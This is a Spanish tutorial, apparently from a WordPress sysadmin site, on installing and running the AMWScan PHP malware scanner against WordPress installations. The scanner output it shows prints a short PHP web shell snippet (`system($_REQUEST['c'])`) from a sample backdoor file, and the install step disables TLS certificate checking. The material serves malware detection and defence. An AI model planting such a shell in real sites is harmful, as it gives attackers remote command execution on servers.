Última revisión: 2 de octubre de 2021
Una de las mayores preocupaciones de los usuarios de WordPress es tener algún ataque y que pase desapercibido, principalmente por la descarga de algún theme o plugin que pueda tener alguna vulnerabilidad o descargas de sitios indebidos.
Aunque existen plugins que lo hacen, no dejan de ser otra oportunidad y problema de seguridad, así que utilizaremos una herramienta externa que nos ayude a analizar la posibilidad de encontrarse con ficheros indebidos.
AMWScan (PHP Antimalware Scanner) es una herramienta escrita en PHP y que analiza código PHP, por lo que viene perfecto a la hora de analizar WordPress. Además, tiene una integración cuando detecta WordPress que realiza algunas tareas extra, como el checksum de los plugins y themes en el repositorio oficial.
Este tutorial ha sido creado en un VPS de Clouding.io. Puedes crear tu propio VPS desde 3€/mes.
Además, tienes la posibilidad de crear tu VPS con la imagen de WordPress en un clic.
COLABORACIÓN
Requisitos
- WordPress
Instalación y configuración
Para hacer más sencillo su uso, vamos a instalar y a configurar PHP Antimalware Scanner para que se pueda usar como un comando en cualquier parte del sistema
Primero descargamos el fichero principal
wget https://raw.githubusercontent.com/marcocesarato/PHP-Antimalware-Scanner/master/dist/scanner --no-check-certificate -O /usr/bin/awscan.phar
Crearemos el sistema ejecutable
vim /usr/bin/awscan
y le incluiremos el siguiente contenido
#!/bin/bash
php /usr/bin/awscan.phar $@
Una vez tengamos el fichero, le daremos permisos y lo configuraremos para su futura ejecución.
chmod u+x,g+x /usr/bin/awscan.phar
chmod u+x,g+x /usr/bin/awscan
export PATH=$PATH":/usr/bin"
Análisis
En este momento, podemos lanzarlo para probar que funciona. Haremos un análisis completo, aunque permite algunas configuraciones:
- -e: sólo busca exploits
- -l: análisis reducido
En cualquier caso, la recomendación es primero lanzar un análisis sin parámetros, para revisar todo. Podemos ir a la carpeta donde tenemos el WordPress o ejecutarlo indicándole donde se encuentra.
awscan /webs/example.com/
Esto nos devolverá, en el caso de un WordPress, algo tal que así:
█████╗ ███╗ ███╗██╗ ██╗███████╗ ██████╗ █████╗ ███╗ ██╗
██╔══██╗████╗ ████║██║ ██║██╔════╝██╔════╝██╔══██╗████╗ ██║
███████║██╔████╔██║██║ █╗ ██║███████╗██║ ███████║██╔██╗ ██║
██╔══██║██║╚██╔╝██║██║███╗██║╚════██║██║ ██╔══██║██║╚██╗██║
██║ ██║██║ ╚═╝ ██║╚███╔███╔╝███████║╚██████╗██║ ██║██║ ╚████║
╚═╝ ╚═╝╚═╝ ╚═╝ ╚══╝╚══╝ ╚══════╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═══╝
Github: https://github.com/marcocesarato/PHP-Antimalware-Scanner
version 0.7.5.177
PHP Antimalware Scanner
Created by Marco Cesarato
Start scanning...
Scan date: 07-01-2021 09:22:35
Scanning /webs/example.com
Mapping and retrieving checksums, please wait...
Found WordPress 5.6 (en_US) at "/webs/example.com"
Found WordPress Plugin Akismet Anti-Spam 4.1.8
Found WordPress Plugin Gutenberg 9.7.0
Found WordPress Plugin Health Check & Troubleshooting 1.4.5
Found WordPress Plugin Jetpack by WordPress.com 9.2.1
Found WordPress Plugin Two Factor 0.7.0
Found WordPress Plugin Wordfence Security 7.4.14
Retrieving checksums of WordPress Plugin Health Check & Troubleshooting 1.4.5
Retrieving checksums of WordPress Plugin Jetpack by WordPress.com 9.2.1
Retrieving checksums of WordPress Plugin Two Factor 0.7.0
Retrieving checksums of WordPress Plugin Wordfence Security 7.4.14
Verifying files checksum...
[===============================] 100% 2385/2385 [10 sec/0 sec]
Found 51 files to check
Checking files...
[=============================> ] 98% 50/51 [11 sec/0 sec]]
Scan finished!
SUMMARY
Files scanned: 51
Files edited: 0
Files quarantined: 0
Files whitelisted: 0
Files ignored: 0
Malware detected: 0
Malware removed: 0
Encontrando contenido malicioso
En el caso de que encuentre contenido malicioso, nos devolverá el análisis algunos datos extra. primero nos indicará qué fichero es el que tiene el problema, posteriormente una preview de su contenido y qué funciones o líneas podrían ser la que dan los problemas.
Con esto una serie de opciones de qué queremos hacer:
[1] Delete file
[2] Move to quarantine
[3] Dry run evil code fixer
[4] Dry run evil line code fixer
[5] Open with vim
[6] Open with nano
[7] Add to whitelist
[8] Show source
[-] Ignore
El sistema lleva integradas algunas posibilidades para corregir el problema, aunque en este caso lo más recomendable es analizar y saber qué es lo que está fallando, si realmente es un problema o no.
Un ejemplo del resultado que daría un posible backdoor es este.
█████╗ ███╗ ███╗██╗ ██╗███████╗ ██████╗ █████╗ ███╗ ██╗
██╔══██╗████╗ ████║██║ ██║██╔════╝██╔════╝██╔══██╗████╗ ██║
███████║██╔████╔██║██║ █╗ ██║███████╗██║ ███████║██╔██╗ ██║
██╔══██║██║╚██╔╝██║██║███╗██║╚════██║██║ ██╔══██║██║╚██╗██║
██║ ██║██║ ╚═╝ ██║╚███╔███╔╝███████║╚██████╗██║ ██║██║ ╚████║
╚═╝ ╚═╝╚═╝ ╚═╝ ╚══╝╚══╝ ╚══════╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═══╝
Github: https://github.com/marcocesarato/PHP-Antimalware-Scanner
version 0.7.5.177
PHP Antimalware Scanner
Created by Marco Cesarato
Start scanning...
Scan date: 07-01-2021 09:27:57
Scanning /PHP-Malware-Collection/shell/php-backdoor.php
Mapping and retrieving checksums, please wait...
Found 1 files to check
Checking files...
[> ] 0% 0/1 [0 sec/0 sec]
PROBABLE MALWARE FOUND!
/PHP-Malware-Collection/shell/php-backdoor.php
=================================== PREVIEW ====================================
27 | if(isset($_REQUEST['c'])){
28 | echo "<pre>";
29 | system($_REQUEST['c']);
30 | die;
31 | }
================================================================================
Checksum: 2b5cb105c4ea9b5ebc64705b4bd86bf7
File path: /PHP-Malware-Collection/shell/php-backdoor.php
Evil code found:
[!] Exploit `execution` [line 29]
- RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP
=> system($_REQUEST['c'])
[!] Function `system` [line 28]
- Encoded Function `system`
=> ";
system($_REQUEST['c'])
[!] Sign `100` [line 29]
- Definition sign `100`
=> system($_REQUEST[
[!] Sign `110` [line 28]
- Definition sign `110`
=> echo "<pre>";
system($_REQUEST['c']);
die;
OPTIONS:
[1] Delete file
[2] Move to quarantine
[3] Dry run evil code fixer
[4] Dry run evil line code fixer
[5] Open with vim
[6] Open with nano
[7] Add to whitelist
[8] Show source
[-] Ignore
amwscan > What is your choice? -
File '/PHP-Malware-Collection/shell/php-backdoor.php' skipped!
Scan finished!
SUMMARY
Files scanned: 1
Files edited: 0
Files quarantined: 0
Files whitelisted: 0
Files ignored: 1
Malware detected: 1
Malware removed: 0
Files ignored:
/PHP-Malware-Collection/shell/php-backdoor.php
Sobre este documento
Este documento está regulado por la licencia EUPL v1.2, publicado en WP SysAdmin y creado por Javier Casares. Por favor, si utilizas este contenido en tu sitio web, tu presentación o cualquier material que distribuyas, recuerda hacer una mención a este sitio o a su autor, y teniendo que poner el material que crees bajo licencia EUPL.